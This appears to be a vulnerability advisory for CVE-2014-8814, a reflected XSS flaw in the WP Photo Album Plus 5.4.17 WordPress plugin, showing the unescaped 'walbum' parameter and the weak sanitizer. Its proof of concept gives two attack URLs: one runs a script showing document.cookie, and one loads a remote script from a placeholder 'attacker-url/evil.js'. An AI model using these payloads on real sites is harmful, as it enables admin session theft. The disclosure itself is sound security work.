WP Photo Album Plus 5.4.17 Reflected XSS

Homepage:

https://wordpress.org/plugins/wp-photo-album-plus/

CVE-ID

CVE-2014-8814

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

$_GET['walbum'] is not escaped.

File: wp-photo-album-plus\wppa-widget-admin.php

if (isset($_GET['walbum'])) {
	$walbum = wppa_walbum_sanitize($_GET['walbum']);
	wppa_update_option('wppa_widget_album', $walbum);
}
<?php _e('Or Edit:', 'wppa'); ?><input type="text" name="wppa-widget-albums" id="wppa-was" value="<?php echo $wppa_opt['wppa_widget_album'] ?>" />

XSS will be converted to lower case and cannot contain words: all-sep, all, sep, topten, clr.

File: wp-photo-album-plus\wppa-widget-functions.php

function wppa_walbum_sanitize( $walbum ) {
	$result = strtolower( $walbum );
	
	if ( strstr( $result, 'all-sep' ) ) $result = 'all-sep';
	elseif ( strstr( $result, 'all' ) ) $result = 'all';
	elseif ( strstr( $result, 'sep' ) ) $result = 'sep';
	elseif ( strstr( $result, 'topten' ) ) $result = 'topten';
	elseif ( strstr( $result, 'clr' ) ) $result = '';
	else {
	
		// Change multiple commas to one
		while ( substr_count( $result, ',,' ) ) $result = str_replace( ',,', ',', $result );
		
		// remove leading and trailing commas
		$result = trim( $result, ',' );
	}
	return $result;
}

Proof of Concept:

Reflected XSS visible for admin:

http://wordpress-install/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script>alert(document.cookie);</script>

Another version for IE 11.0.9600 based on WhiteHat Security - Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter:

http://wordpress-install/wp-admin/admin.php?page=wppa_photo_of_the_day&walbum="><script src=http://attacker-url/evil.js></script>

Timeline: